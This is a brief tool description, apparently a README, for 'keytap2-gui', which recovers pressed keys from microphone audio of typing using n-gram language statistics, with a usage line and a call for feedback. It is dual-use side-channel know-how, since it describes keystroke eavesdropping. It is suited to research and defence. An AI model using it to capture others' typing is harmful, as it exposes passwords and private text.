Detect pressed keys via microphone audio capture. Uses statistical information (n-gram frequencies) about the language. No training data is required. The 'recording.kbd' input file has to be generated via the record-full tool and contains the audio data that will be analyzed. The 'n-gram.txt' file has to contain n-gram probabilities for the corresponding language.
Usage: ./keytap2-gui recording.kbd n-gram.txt


Feedback
Any feedback about the performance of the tools is highly appreciated. Please drop a comment here.

